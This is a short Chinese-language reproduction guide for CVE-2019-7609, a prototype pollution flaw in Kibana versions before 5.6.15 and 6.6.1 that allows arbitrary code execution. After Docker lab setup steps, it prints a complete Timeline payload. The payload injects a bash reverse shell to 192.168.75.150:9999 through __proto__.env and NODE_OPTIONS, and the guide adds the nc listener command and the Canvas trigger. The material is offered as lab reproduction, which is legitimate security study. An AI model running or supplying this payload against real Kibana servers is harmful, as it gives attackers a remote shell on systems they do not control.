Kibana 原型鏈汙染導致任意程式碼執行漏洞 (CVE-2019-7609)
阿新 • • 發佈:2022-05-17
Kibana 為 Elassticsearch 設計的一款開源的檢視工具。其5.6.15和6.6.1之前的版本中存在一處原型鏈汙染漏洞,利用這個漏洞我們可以在目標伺服器上執行任意JavaScript程式碼。
參考連結:
- https://nvd.nist.gov/vuln/detail/CVE-2019-7609
- https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/
- https://slides.com/securitymb/prototype-pollution-in-kibana/#/4
漏洞環境
啟動環境前,需要先在Docker主機上執行如下命令,修改vm.max_map_count
sysctl -w vm.max_map_count=262144
之後,執行如下命令啟動Kibana 6.5.4和Elasticsearch 6.8.6:
docker-compose up -d
環境啟動後,訪問http://your-ip:5601
即可看到Kibana頁面。
漏洞復現
原型鏈汙染髮生在“Timeline”頁面,我們填入如下Payload:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/192.168.75.150/9999 0>&1\'");//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
開啟監聽
nc -lvvp 9999
輸入Payload
訪問Canvas模組觸發漏洞
反彈Shell成功